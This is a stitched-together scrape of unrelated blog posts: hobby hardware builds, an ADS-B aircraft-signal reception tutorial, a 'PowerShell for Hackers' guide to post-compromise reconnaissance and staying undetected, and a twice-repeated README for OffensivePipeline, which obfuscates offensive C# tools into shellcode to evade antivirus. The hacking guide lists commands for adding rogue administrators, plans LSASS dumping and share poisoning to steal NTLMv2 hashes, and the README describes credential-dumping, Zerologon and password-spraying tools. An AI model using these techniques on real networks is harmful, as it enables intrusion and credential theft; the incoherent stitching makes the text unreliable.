One of the most influential inventions of the 20th century was Big Mouth Billy Bass. A celebrity bigger than the biggest politicians or richest movie stars, thereโs almost nothing that could beat Billy. That is, until [Kiara] from Kiaraโs Workshop built a Magikarp version of Big Mouth Billy Bass.
Sizing in at over 2 entire feet, the orange k-carp is able to dance, it is able to sing, and it is able to stun the crowd. Magikarp functions the same way as its predecessor; a small button underneath allows the show to commence. Of course, this did not come without its challenges.
Starting the project was easy, just a model found online and some Blender fun to create a basic mold. Dissecting Big Mouth Billy Bass gave direct inspiration for how to construct the new idol in terms of servos and joints. Programming wasnโt even all that much with the use of Bottango for animations. Filling the mold with the silicone filling proved to be a bit more of a challenge.
After multiple attempts with some minor variations in procedure, [Kirara] got the fish starโs skin just right. All it took was a paint job and some foam filling to get the final touches. While this wasnโt the most mechanically challenging animatronic project, we have seen our fair share of more advanced mechanics. For example, check out this animatronic that sees through its own eyes!
The Sharp PC-G801 was an impressive little pocket computer when it debuted in 1988. However, in the year 2025, a Z80-compatible machine with just 8 kB of RAM is hardly much to get excited about. [shiura] decided to take one of these old machines and upgrade it into something more modern and useful.
The build maintains the best parts of the Sharp design โ namely, the case and the keypad. The original circuit board has been entirely ripped out, and a custom PCB was designed to interface with the membrane keypad and host the new internals. [shiura] landed on the Raspberry Pi Zero 2W to run the show. Itโs a capable machine that runs Linux rather well and has wireless connectivity out of the box. Itโs paired with an ESP32-S3 microcontroller that handles interfacing all the various parts of the original Sharp hardware. It also handles the connection to the 256ร64 OLED display. The new setup can run in ESP32-only mode, where it acts as a classic RPN-style calculator. Alternatively, the Pi Zero can be powered up for a full-fat computing experience.
Every few minutes an airplane may fly over your head, maybe more than one. If you live close to an airport, the air traffic in your area is especially heavy. Services like Flightradar24 show information about aircraft in the air with surprising accuracy because they get data using the ADS-B protocol. You can collect that data yourself, and here we will show how.
Of course, everyone has flown on a plane or at least seen one. These large metal birds circle the globe and carry hundreds of millions of people to different parts of the world. That wasnโt always the case. Just 100 years ago people mostly moved by land and there were no highly reliable flying machines. After planes were invented and commercial flights began, it became clear that we needed a way to track aircraft in the sky, otherwise accidents would be unavoidable. Radar and visual observation are not enough for this, so radio communication came into use. Now every aircraft has an aviation transponder on board. It makes life much easier for dispatchers and pilots, as the aircraft sends data from onboard sensors and receives instructions from the ground while in flight.
Put simply, an aviation transponder is a two-way radio device that does two things:
1. Answers queries from ground stations: when an air traffic controller requests data, the transponder replies automatically. A query for data is also called interrogation.
2. Acts as an airborne radio beacon: in this mode the transponder periodically broadcasts information about itself, for example position or speed.
Modes
There are different generations or modes of transponders. Each was created for different purposes and has its own signal structure. Although newer modes keep the features of the older ones, the signal protocols are not mutually compatible. There are five main modes:
1. Mode A: transmits only the aircraftโs identification code. This code can be hard-programmed into the transponder or assigned by the dispatcher before flight. In practice Mode A was mostly used to track which aircraft was at which airport.
2. Mode C: developed later, it allowed tracking not only the aircraft ID but also flight altitude. Its main advantage was that altitude could be obtained automatically without asking the pilot.
3. Mode S: this is the modern mode used on about 99% of all aircraft today. It allows not only reading sensor data from the aircraft but also sending data back to the plane. In Mode S an aircraft has full two-way communication with ground stations. ADS-B, which we will look at today, is part of this mode.
4. Mode 4 and Mode 5: these are more advanced but used only by the military. Both are much better protected (that is, they have some security, unlike the older modes), so they are not something we can play with.
A careful reader will notice we did not include Mode B or Mode D in the list. Both existed only briefly, so it makes little sense to discuss them here.
ADS-B
If you read the description of Mode S closely, youโll notice that Mode S messages are normally sent by the transponder in response to a ground station query. All of them except ADS-B. ADS-B stands for Automatic Dependent Surveillance Broadcast. In plain English that means it is an automatic flight-tracking system. The word โBroadcastโ means the messages are sent out to everyone, not to a specific recipient, and that lets us receive them.
Many people treat ADS-B as a separate transponder mode on the same level as Mode A, C, or S, but actually ADS-B is just a part of Mode S. An ADS-B message is simply a Mode S message with type 17.
Types of Mode S messages
We will focus on ADS-B (type 17) in this article, but it helps to know about other Mode S message types for context:
All-call reply (type 11): the transponder replies to a ground interrogation with a unique 24-bit identifier. This number is usually programmed at the factory and does not change, although in military contexts it may be altered.
ACAS short and long replies (type 0/16): messages used by collision-avoidance systems. If a transponder detects another aircraft nearby it will send alerts to other systems that can prevent a mid-air collision.
Altitude and identity replies (type 4/5): messages containing altitude and the call sign (the so-called squawk code that the pilot enters before flight).
Comm-B (type 20/21): messages with readings from onboard sensors, planned route, and other data useful for aircraft control.
ACAS is especially clever in how it works, but discussing it in detail would take us beyond this article.
All Mode S transmissions to aircraft use 1030 MHz (uplink), and transmissions from aircraft to the ground use 1090 MHz.
The radio transmission itself is not encrypted. It carries a lot of useful information about the aircraftโs position, altitude, speed, and other parameters. That is how services like Flightradar24 started making aircraft information available to everyone for free. These services collect data from many sensors installed by volunteers around the world. You can become one of those volunteers too. All you need is to sign up and get a receiver from a service operator for installation.
Physical structure of the signal
ADS-B signals are transmitted by aircraft on 1090 MHz, just like the other Mode S signals. The other frequency, 1030 MHz (uplink), is not needed for ADS-B because ADS-B transmissions are sent without being asked.
Pulse-Position Modulation (PPM) is used to encode the signal. In basic terms, the transmitter sends bits over the air that can be read by sampling the signal every N microseconds. On ADS-B each bit lasts 0.5 microseconds, so you can sample every 0.5 ฮผs, see whether the signal level is high or low at each moment, record that, then convert the result into bytes to reconstruct the original message. Thatโs the theory, in practice itโs more challenging.
Packet structure
If you take the raw sampled data you first get a bit of a mess that must be parsed to extract useful information. The messages themselves have a clear structure, so if you can find repeated parts in the data stream you can reconstruct the whole packet. A packet consists of a preamble and the data payload. The preamble lasts 8 ฮผs, and then the data follows for either 56 or 112 ฮผs.
The preamble is especially important because all aircraft transmit on the same frequency and their signals can arrive at the receiver at the same time. Loss of overlapping signals is handled simply: if a receiver fails to catch a message, some other receiver will. There are many receivers and they cover all inhabited land on Earth, so if a particular signal is too weak for one receiver it will be loud enough for another. This approach doesnโt guarantee every single signal will be caught, but ADS-B messages are transmitted repeatedly, so losing some packets is not a disaster.
We already said each bit is encoded as 0.5 ฮผs, but to make reception easier a convention was introduced where one real bit is encoded using two half-microsecond elements. A logical one is encoded as โ1 then 0โ, and a logical zero as โ0 then 1โ. For example, data bits 1011 would be transmitted as 10011010. This does not complicate the receiver much, but it protects against noise and makes the signal more reliable. Without this doubling, a sequence of zeros would look like silence. With it the receiver always detects activity, even when zeros are sent.
Structure of useful data
Suppose we decoded the signal and found a message. Now we need to decode the payload and filter out unwanted messages (that is, all Mode S messages except ADS-B).
The ADS-B message length we care about is 112 ฮผs, which corresponds to 112 bits (thanks to the two-half-microsecond coding!). The message divides into five main blocks:
1. DF (Downlink Format) โ the format code, 5 bits. For ADS-B this is always 17.
2. CA (Transponder capability) โ type of transponder and its capability level, 3 bits. This tells a controller what data can be requested from this transponder. This field can be 0, 4, 5, or 6. Values 1โ3 and 7 are reserved for future use. 0 means a first-level transponder, usually without ACAS. 4 means a second-level (or higher) transponder that can send altitude (i.e., supports Mode C and Mode S) but does not have ACAS. 5 and 6 are like 4 but with ACAS support: 6 indicates ACAS may be enabled, 5 indicates ACAS may be present but disabled.
3. ICAO โ unique aircraft number, 24 bits. This number identifies the signal sender. It is typically programmed once at the factory and does not change during operation, although some people know how to change it. Military transponders follow different rules, so anything can happen there.
4. ME (Message) โ the actual payload with data about altitude, speed, or other information. Length is 56 bits. We will look at this block in detail below.
5. PI (Parity/Interrogator ID) โ checksum, 24 bits.
The ME field
The ME field is the most interesting part for us because it carries coordinates, speed, altitude, and other data from onboard sensors. Since 56 bits are not enough to carry all possible data at once, each message has a type indicated by the first five bits of ME. In other words, there is a nested format: Mode S uses a certain message type to indicate ADS-B, and ADS-B uses its own internal type to say what data is inside.
ADS-B defines 31 data types in total, but we will review only the main ones. Type 1-4: identification messages. They contain the call sign and other registration/identification information (for example, whether this is a light aircraft or a heavy one). These call signs are shown on airport displays and usually reflect the flight number. A decoded message looks approximately like this:
Type 5-8: ground position. These messages are used to know where and on which runway the aircraft is located. The message may include latitude, longitude, speed, and heading. Example decoded message:
Type 9-19: airborne position (usually transmitted together with altitude). It is important to understand that you will not always find latitude and longitude in the usual long numeric form in these messages, instead a compact notation is used.
Type 19: aircraft velocity.
We could go bit-by-bit through the structure of each message, but that takes a long time. If you are really interested you can find ready ADS-B parsers on GitHub and inspect the formats there. For our purpose, however, diving deeper into the protocolโs details isnโt necessary right now, because we are not going to transmit anything yet.
CPR or how to make a simple thing more complex
To describe a location, we usually use latitude and longitude. A 32-bit floating number can store them with about seven decimal places, which is accurate down to a few centimeters. If we donโt need that much detail and are fine with accuracy of just tens of centimeters, both latitude and longitude together could be stored in about 56 bits. That would have been enough, and there would be no need for special โcompressedโ coordinate tricks. Since an airplane moves at more than 100 meters per second, centimeter-level accuracy is useless anyway. This makes it strange why the protocol designers still chose the compact method.
CPR (Compact Position Reporting) is designed specifically to send coordinates compactly. Part of CPR was already visible in the coordinate example earlier. Because itโs impossible to compress a lot of data into a small field without loss, the designers split the data into parts and send them in two passes with packets labeled โevenโ and โoddโ. How do we recover normal coordinates from this? We will show the idea.
Imagine all aircraft flying in a 2D plane. Divide that plane into two different grids and call them the even grid and the odd grid. Make the even grid 4ร4 and the odd grid 5ร5. Suppose we want to transmit a position that in a 16ร16 grid is at (9, 7). If we had one grid we would just send 9 and 7 and an operator could locate us on the map. In CPR there are two grids, though.
In these grids we would represent our position (9, 7) as (1, 3) on the even grid and (4, 2) on the odd grid. When an operator receives both messages, they must align the two grids.
If you overlay the grids with the received coordinates, the point of intersection is the true location.
We described the algorithm without math so you can imagine how coordinates are reconstructed from two parts. The real grids are far more complex than our toy example and look like the image below.
A simple way to receive ADS-B
Now that we understand the main parts of the protocol, we can try to receive a real signal. To receive any such signal you need three basic things: an antenna, a receiver, and a PC.
Antenna
Start with the most important item, which is the antenna. The choice depends on many factors, including frequency, directionality of the signal, and the environment where it travels. Our signal is transmitted at 1090 MHz, and we will receive it outdoors. The simplest antenna (but not the most efficient) is a straight rod (a monopole). You can make such an antenna from a piece of wire. The main thing is to calculate the right length. Antenna length depends on the wavelength of the signal you want to receive. Wavelength is the distance between two neighboring โpeaksโ of the wave.
Lambda (ฮป) is the wavelength. You get it from frequency with the formula ฮป = C / f, where C is the speed of light and f is the signal frequency. For 1090 MHz it is about 27.5 cm. If you take a metal rod of that length you get a full-wave antenna, which you can safely shorten by half or by four to get a half-wave or quarter-wave antenna, respectively. These different designs have different sensitivity, so I recommend a half-wave antenna, which should be roughly 13.75 cm long.
We wonโt build our own antenna here. It is not the simplest task and we already had a suitable antenna. You might use radio handheld antennas if you receive outdoors and there isnโt too much interference. We use a simple vertical coil-loaded whip antenna. It behaves like a whip but is shorter because of the coil.
You can measure antenna characteristics with a special vector network analyzer that generates different frequencies and checks how the antenna reacts.
The output from NanoVNA looks complicated at first, but itโs simple to interpret. To know if an antenna suits a particular frequency, look at the yellow SWR line. SWR stands for standing wave ratio. This shows what part of the signal the antenna radiates into the air and what part returns. The less signal that returns, the better the antenna works at that frequency. On the device we set marker 1 to 1090 MHz and SWR there was 1.73, which is quite good. Typically an antenna is considered good if SWR is about 1 (and not more than 2).
Receiver
For the receiver we will use an SDR dongle. Itโs basically a radio controlled by software rather than a mechanical dial like old receivers. Any SDR adapter will work for ADS-B reception, from the cheap RTL-SDR to expensive devices like BladeRF. Cheap options start around $30, so anyone can get involved. We will use a BladeRF micro, as it supports a wide frequency range and a high sampling rate.
Putting it all together
Once you have an antenna and an SDR, find a place with few obstructions and low interference. We simply drove about ten kilometers out of town. Signals near 1 GHz (which includes ADS-B) donโt travel much past the horizon, so if you donโt live near an airport and there are obstacles around you may not catch anything.
To inspect the radio spectrum we use GQRX. This program is available for Linux and macOS. On Windows we recommend SDR#. In Ubuntu GQRX can be installed from the standard repositories:
bash$ > sudo apt update
bash$ > sudo apt install -y gqrx
Then increase the volume, select your SDR as the input source, and press the large Start button. If everything is set up correctly, your speakers will start hissing loudly enough to make you jump, after which you can mute the sound with the Mute button in the lower right corner.
You can choose the receive frequency at the top of the screen, so set it to 1.090.000, which equals 1090 MHz. After that you will see something like the screenshot below.
The short vertical strips near the center are ADS-B signals, which stand out from the background noise. If you donโt see them, try changing the gain settings on the Input Controls tab on the right. If that does not help, open FFT Settings and adjust the Plot and WF parameters. You can also try rotating the antenna or placing it in different orientations.
dump1090
When you get stable reception in GQRX you can move to the next step.
In practice, people who want to receive and decode Mode S signals usually use an existing program. A common open-source tool demodulates and decodes almost all Mode S signals and even outputs them in a neat table. To verify that our setup works correctly, itโs best to start with something thatโs known to work, which is dump1090.
To install it, clone the repository from GitHub and build the binary. Itโs very simple:
After that you should have the binary. If you have an RTL-SDR you can use dump1090 directly with it, but we have a BladeRF which requires a bit more work for support.
First, install the driver for your SDR. Drivers are available in the repositories of most distributions, just search for them. Second, you will need to flash special firmware onto the SDR. For BladeRF those firmware files are available on the Nuand website. Choose the file that matches your BladeRF version.
Next, download and build the decoding program for your SDR:
git clone https://github.com/Nuand/bladeRF-adsb
cd bladeRF-adsb/bladeRF_adsb
make
Then flash the firmware into the BladeRF. You can do this with the bladerf-cli package:
bash$ > bladeRF-cli -l ~/Downloads/adsbxA4.rbf
Now run dump1090 in one terminal and bladeRF-adsb in another (the commands below are examples from our setup):
If everything is correct, in the dump1090 window you will see many hexadecimal lines, those are Mode S messages that still need to be decoded and filtered.
If you remove --raw from the dump1090 startup arguments, the program will automatically decode messages and display them in a table.
Summary
Now youโve seen how aircraft transponders work, what ADS-B actually is, and how signals at 1090 MHz can be received and decoded with simple equipment. None of this requires expensive tools, just an antenna, a software-defined radio and some patience. Once itโs ready, you can watch the same kind of live flight data that powers big services like Flightradar24. We kept the heavy math out of the way so it stays approachable for everyone, but still leaves you with something useful to take away. Itโs possible to push yourself further and do it the hard way without relying on tools like dump1090, but that path takes a lot more time, patience, and willingness to grind through the details.
Weโre continuing our look at how PowerShell can be used in offensive operations, but this time with survival in mind. When youโre operating in hostile territory, creativity and flexibility keep you alive. PowerShell is a powerful tool and how well it serves you depends on how cleverly you use it. The more tricks you know, the better youโll be at adapting when things get tense. In todayโs chapter weโre focusing on a core part of offensive work, which is surviving while youโre inside the target environment. These approaches have proven themselves in real operations. The longer you blend in and avoid attention, the more you can accomplish.
Weโll split this series into several parts. This first piece is about reconnaissance and learning the environment youโve entered. If you map the perimeter and understand the scope of your target up front, youโll be far better placed to move into exploitation without triggering traps defenders have set up. It takes patience. As OTW says, true compromises usually require time and persistence. Defenders often rely on predictable detection patterns, and that predictability is where many attackers get caught. Neglecting the basics is a common and costly mistake.
When the stakes are high, careless mistakes can ruin everything. You can lose access to a target full of valuable information and damage your reputation among other hackers. Thatโs why we made this guide to help you use PowerShell in ways that emphasize staying undetected and keeping access. Every move should be calculated. Risk is part of the job, but it should never be reckless. Thatโs also why getting comfortable with PowerShell matters, as it gives you the control and flexibility you need to act professionally.
If you read our earlier article PowerShell for Hackers: Basics, then some of the commands in Part 1 will look familiar. In this article we build on those fundamentals and show how to apply them with survival and stealth as the priority.
Basic Reconnaissance
Hostname
Once you have access to a host, perhaps after a compromise or phishing attack, the first step is to find out exactly which system you have landed on. That knowledge is the starting point for planning lateral movement and possible domain compromise:
PS > hostname
Sometimes the hostname is not very revealing, especially in networks that are poorly organized or where the domain setup is weak. On the other hand, when you break into a large companyโs network, youโll often see machines labeled with codes instead of plain names. Thatโs because IT staff need a way to keep track of thousands of systems without getting lost. Those codes arenโt random, they follow a logic. If you spend some time figuring out the pattern, you might uncover hints about how the company structures its network.
System Information
To go further, you can get detailed information about the machine itself. This includes whether it is domain-joined, its hardware resources, installed hotfixes, and other key attributes.
PS > systeminfo
This command is especially useful for discovering the domain name, identifying whether the machine is virtual, and assessing how powerful it is. A heavily provisioned machine is often important. Just as valuable is the operating system type. For instance, compromising a Windows server is a significant opportunity. Servers typically permit multiple RDP connections and are less likely to be personal workstations. This makes them more attractive for techniques such as LSASS and SAM harvesting. Servers also commonly host information that is valuable for reconnaissance, as well as shares that can be poisoned with malicious LNK files pointing back to your Responder.
Once poisoned, any user accessing those shares automatically leaks their NTLMv2 hashes to you, which you can capture and later crack using tools like Hashcat.
OS Version
If your shell is unstable or noninteractive and you cannot risk breaking it with systeminfo. Here is your alternative:
Different versions of Windows expose different opportunities for abuse, so knowing the precise version is always beneficial.
Patches and Hotfixes
Determining patch levels is important. It tells you which vulnerabilities might still be available for exploitation. End-user systems tend to be updated more regularly, but servers and domain controllers often lag behind. Frequently they lack antivirus protection, still run legacy operating systems like Windows Server 2012 R2, and hold valuable data. This makes them highly attractive targets.
Many administrators mistakenly believe isolating domain controllers from the internet is sufficient security. The consequence is often unpatched systems. We once compromised an organization in under 15 minutes with the NoPac exploit, starting from a low-privileged account, purely because their DC was outdated.
To review installed hotfixes:
PS > wmic qfe get Caption,Description,HotFixID,InstalledOn
Remember, even if a system is unpatched, modern antivirus tools may still detect exploitation attempts. Most maintain current signature databases.ย
Defenses
Before proceeding with exploitation or lateral movement, always understand the defensive posture of the host.
Firewall Rules
Firewall configurations can reveal why certain connections succeed or fail and may contain clues about the broader network. You can find this out through passive reconnaissance:ย
PS > netsh advfirewall show allprofiles
The output may seem overwhelming, but the more time you spend analyzing rules, the more valuable the information becomes. As you can see above, firewalls can generate logs that are later collected by SIEM tools, so be careful before you initiate any connection.
Antivirus
Antivirus software is common on most systems. Since our objective here is to survive using PowerShell only, we wonโt discuss techniques for abusing AV products or bypassing AMSI, which are routinely detected by those defenses. That said, if you have sufficient privileges you can query installed security products directly to learn whatโs present and how theyโre configured. You might be lucky to find a server with no antivirus at all, but you should treat that as the exception rather than the rule
This method reliably identifies the product in use, not just Microsoft Defender. For more details, such as signature freshness and scan history run this:
PS > Get-MpComputerStatus
To maximize survivability, avoid using malware on these machines. Even if logging is not actively collected, you must treat survival mode as if every move is observed. The lack of endpoint protection does not let you do everything. We saw people install Gsocket on Linux boxes thinking it would secure access, but in reality network monitoring quickly spotted those sockets and defenders shut them down. Same applies to Windows.
Script Logging
Perhaps the most important check is determining whether script logging is enabled. This feature records every executed PowerShell command.
If EnableScriptBlockLogging is set to 1, all your activity is being stored in the PowerShell Operational log. Later we will show you strategies for operating under such conditions.
Users
Identifying who else is present on the system is another critical step.
The quser command is user-focused, showing logged-in users, idle times, and session details:
PS > quser
Meanwhile, qwinsta is session-focused, showing both active and inactive sessions. This is particularly useful when preparing to dump LSASS, as credentials from past sessions often remain in memory. It also shows the connection type whether console or RDP.
PS > qwinsta
Network Enumeration
Finding your way through a hostile network can be challenging. Sometimes you stay low and watch, sometimes you poke around to test the ground. Here are the essential commands to keep you alive.
ARP Cache
The ARP table records known hosts with which the machine has communicated. It is both a reconnaissance resource and an attack surface:
PS > arp -a
ARP entries can reveal subnets and active hosts. If you just landed on a host, this could be valuable.
Note: a common informal convention is that smaller organizations use the 192.168.x.x address space, mid-sized organizations use 172.16.x.xโ172.31.x.x, and larger enterprises operate within 10.0.0.0/8. This is not a rule, but it is often true in practice.
Known Hosts
SSH is natively supported on modern Windows but less frequently used, since tools like PuTTY are more common. Still, it is worth checking for known hosts, as they might give you insights about the network segmentation and subnets:
PS > cat %USERPROFILE%\.ssh\known_hosts
Routes
The route table exposes which networks the host is aware of, including VLANs, VPNs, and static routes. This is invaluable for mapping internal topology and planning pivots:
PS > route print
Learning how to read the output can take some time, but itโs definitely worth it. We know many professional hackers that use this command as part of their recon toolbox.
Interfaces
Knowing the network interfaces installed on compromised machines helps you understand connectivity and plan next steps. Always record each host and its interfaces in your notes:
PS > ipconfig /all
Maintaining a record of interfaces across compromised hosts prevents redundant authentication attempts and gives a clearer mindmap of the environment.
Net Commands
The net family of commands remains highly useful, though they are often monitored. Later we will discuss bypass methods. For now, letโs review their reconnaissance value.
Password Policy
Knowing the password policy helps you see if brute force or spraying is possible. But keep in mind, these techniques are too noisy for survival mode:
PS > net accounts /domain
Groups and Memberships
Local groups, while rarely customized in domain environments, can still be useful:
PS > net localgroup
Domain groups are far more significant:
PS > net group /domain
Checking local Administrators can show privilege escalation opportunities:
PS > net localgroup Administrators
Investigating domain group memberships often reveals misconfigured privileges:
PS > net group <group_name> /domain
With sufficient rights, groups can be manipulated:
PS > net localgroup Administrators hacker /add
PS > net group "Marketing" user /add /domain
However, directly adding accounts to highly privileged groups like Domain Admins is reckless. These groups are closely monitored. Experienced hackers instead look for overlooked accounts, such as users with the โpassword not requiredโ attribute or exposed credentials in LDAP fields.
Domain Computers and Controllers
Domain computer lists reveal scope, while controllers are critical to identify and study:
PS > net group "Domain Computers" /domain
PS > net group "Domain Controllers" /domain
Controllers in particular hold the keys to Active Directory. LDAP queries against them can return huge amounts of intelligence.
Domain Users
Enumerating users can give you useful account names. Administrators might include purpose-based prefixes such as โadmโ or โsvcโ for service accounts, and descriptive fields sometimes contain role notes or credential hints.
PS > net user /domain
Shares
Shares are often overlooked by beginners, and thatโs a common mistake. A share is basically a place where valuable items can be stored. At first glance it may look like a pile of junk full of unnecessary files and details. And that might be true, since these shares are usually filled with paperwork and bureaucratic documents. But among that clutter we often find useful IT data like passwords, VPN configurations, network maps and other items. Finding documents owned by assistants is just as important. Assistants usually manage things for their directors, so youโll often find a lot of directorsโ private information, passwords, emails, and similar items. Here is how you find local shares hosted on your computer:
PS > net share
Remote shares can also be listed:
PS > net view \\computer /ALL
Enumerating all domain shares creates a lot of noise, but it can be done if you donโt have a clear understanding of the hosts. We do not recommend doing this. If the host names already give you enough information about their purpose, for example, โDBโ or โBACKUPโ, then further enumeration isnโt necessary. Going deeper can get you caught, even on a small or poorly managed network. If you decide to do it, here is how you can enumerate all shares in the domain:
PS > net view /all /domain[:domainname]
Interesting shares can be mounted for detailed searching:
PS > net use x: \\computer\share
You can search through documents in a share using specific keywords:
Thatโs it for Part 1 of the Survival Series. Weโre excited to keep this going, showing you different ways to work with systems even when youโre limited in what you can do. Sure, the commands you have are restricted, but survival sometimes means taking risks. If you play it too safe, you might get stuck and have no way forward. Time can work against you, and making bold moves at the right moment can pay off.
The goal of this series is to help you get comfortable with the Windows tools you have at your disposal for recon and pentesting. There will be times when you donโt have much, and youโll need to make the most of whatโs available.
In Part 2, weโll go deeper looking at host inspections, DC queries, and the Active Directory modules that can give you even more insight. Having these native tools makes it easier to stay under the radar, even when things are going smoothly. As you get more experience, youโll find that relying on built-in tools is often the simplest, most reliable way to get the job done.
Normal people prepare presentations in PowerPoint (or Libreโs Impress or Googleโs Slides), but itโs boring. I mean, presentations are generally boring and should only be a background for a speaker, and making them in a software like a PowerPoint makes them even worse (too many options to distract the creator and not focus on the content). Great
OfensivePipeline allows you to download and build C# tools, applying certain modifications in order to improve their evasion for Red Team exercises. A common use of OffensivePipeline is to download a tool from a Git repository, randomise certain values in the project, build it, obfuscate the resulting binary and generate a shellcode.
Features
Currently only supports C# (.Net Framework) projects
Allows to clone public and private (you will need credentials :D) git repositories
Allows to work with local folders
Randomizes project GUIDs
Randomizes application information contained in AssemblyInfo
Builds C# projects
Obfuscates generated binaries
Generates shellcodes from binaries
There are 79 tools parameterised in YML templates (not all of them may work :D)
New tools can be added using YML templates
It should be easy to add new plugins...
What's new in version 2.0
Almost complete code rewrite (new bugs?)
Cloning from private repositories possible (authentication via GitHub authToken)
Possibility to copy a local folder instead of cloning from a remote repository
RandomGuid: randomise the GUID in .sln, .csproj and AssemblyInfo.cs files
RandomAssemblyInfo: randomise the values defined in AssemblyInfo.cs
BuildCsharp: build c# project
ConfuserEx: obfuscate c# tools
Donut: use Donut to generate shellcodes. The shellcode generated is without parameters, in future releases this may be changed.
Add a tool from a remote git
The scripts for downloading the tools are in the Tools folder in yml format. New tools can be added by creating new yml files with the following format:
Rubeus.yml file:
tool: - name: Rubeus description: Rubeus is a C# toolset for raw Kerberos interaction and abuses gitLink: https://github.com/GhostPack/Rubeus solutionPath: Rubeus\Rubeus.sln language: c# plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut authUser: authToken:
Where:
Name: name of the tool
Description: tool description
GitLink: link from git to clone
SolutionPath: solution (sln file) path
Language: language used (currently only c# is supported)
Plugins: plugins to use on this tool build process
AuthUser: user name from github (not used for public repositories)
AuthToken: auth token from github (not used for public repositories)
tool: - name: SeatbeltLocal description: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. gitLink: C:\Users\alpha\Desktop\SeatbeltLocal solutionPath: SeatbeltLocal\Seatbelt.sln language: c# plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut authUser: authToken:
Where:
Name: name of the tool
Description: tool description
GitLink: path where the tool is located
SolutionPath: solution (sln file) path
Language: language used (currently only c# is supported)
Plugins: plugins to user on this tool build process
AuthUser: user name from github (not used for local repositories)
AuthToken: auth token from github (not used for local repositories)
Requirements for the release version (Visual Studio 2019/2022 is not required)
Description: A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts (Petitpotam) and relaying to the certificate service.
Description: This modified fork of SafetyKatz dynamically fetches the latest pre-compiled release of Mimikatz directly from the gentilkiwi GitHub repo, runtime patching on detected signatures and uses SharpSploit DInvoke to get it into memory.
Description: Enumerate Domain Data is designed to be similar to PowerView but in .NET. PowerView is essentially the ultimate domain enumeration tool, and we wanted a .NET implementation that we worked on ourselves. This tool was largely put together by viewing implementations of different functionality across a wide range of existing projects and combining them into EDD.
Description: PurpleSharp is an open source adversary simulation tool written in C# that executes adversary techniques within Windows Active Directory environments
Description: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
Description: SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract
Description: SharpCloud is a simple C# utility for checking for the existence of credential files related to Amazon Web Services, Microsoft Azure, and Google Compute.
Description: SharpDir is a simple code set to search both local and remote file systems for files using the same SMB process as dir.exe, which uses TCP port 445
Description: Checks running processes, process metadata, Dlls loaded into your current process and each DLLs metadata, common install directories, installed services and each service binaries metadata, installed drivers and each drivers metadata, all for the presence of known defensive products such as AV's, EDR's and logging tools.
Description: SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.
Description: This project reuses open handles to lsass to parse or minidump lsass, therefore you don't need to use your own lsass handle to interact with it. (Dinvoke-version)
Description: This executable is made to be executed within Cobalt Strike session using execute-assembly. It will retrieve the LAPS password from the Active Directory.
Description: Create a minidump of the LSASS process from memory (Windows 10 - Windows Server 2016). The entire process uses dynamic API calls, direct syscall and Native API unhooking to evade the AV / EDR detection.
Description: This project is a C# tool to use Pass-the-Hash for authentication on a local Named Pipe for user Impersonation. You need a local administrator or SEImpersonate rights to use this.
Description: SharpReg is a simple code set to interact with the Remote Registry service API using the same SMB process as reg.exe, which uses TCP port 445
Description: SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr, formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI.
Description: SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.
Description: SharpSvc is a simple code set to interact with the SC Manager API using the same DCERPC process as sc.exe, which open with TCP port 135 and is followed by the use of an ephemeral TCP port
Description: SharpTask is a simple code set to interact with the Task Scheduler service API using the same DCERPC process as schtasks.exe, which open with TCP port 135 and is followed by the use of an ephemeral TCP port.
Description: An exploit for CVE-2020-1472, a.k.a. Zerologon. This tool exploits a cryptographic vulnerability in Netlogon to achieve authentication bypass.
Description: While Sysmon's driver can be renamed at installation, it is always loaded at altitude 385201. The objective of this tool is to challenge the assumption that our defensive tools are always collecting events.
Description: Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly, but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment).
Description: Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account.
OfensivePipeline allows you to download and build C# tools, applying certain modifications in order to improve their evasion for Red Team exercises. A common use of OffensivePipeline is to download a tool from a Git repository, randomise certain values in the project, build it, obfuscate the resulting binary and generate a shellcode.
Features
Currently only supports C# (.Net Framework) projects
Allows to clone public and private (you will need credentials :D) git repositories
Allows to work with local folders
Randomizes project GUIDs
Randomizes application information contained in AssemblyInfo
Builds C# projects
Obfuscates generated binaries
Generates shellcodes from binaries
There are 79 tools parameterised in YML templates (not all of them may work :D)
New tools can be added using YML templates
It should be easy to add new plugins...
What's new in version 2.0
Almost complete code rewrite (new bugs?)
Cloning from private repositories possible (authentication via GitHub authToken)
Possibility to copy a local folder instead of cloning from a remote repository
RandomGuid: randomise the GUID in .sln, .csproj and AssemblyInfo.cs files
RandomAssemblyInfo: randomise the values defined in AssemblyInfo.cs
BuildCsharp: build c# project
ConfuserEx: obfuscate c# tools
Donut: use Donut to generate shellcodes. The shellcode generated is without parameters, in future releases this may be changed.
Add a tool from a remote git
The scripts for downloading the tools are in the Tools folder in yml format. New tools can be added by creating new yml files with the following format:
Rubeus.yml file:
tool: - name: Rubeus description: Rubeus is a C# toolset for raw Kerberos interaction and abuses gitLink: https://github.com/GhostPack/Rubeus solutionPath: Rubeus\Rubeus.sln language: c# plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut authUser: authToken:
Where:
Name: name of the tool
Description: tool description
GitLink: link from git to clone
SolutionPath: solution (sln file) path
Language: language used (currently only c# is supported)
Plugins: plugins to use on this tool build process
AuthUser: user name from github (not used for public repositories)
AuthToken: auth token from github (not used for public repositories)
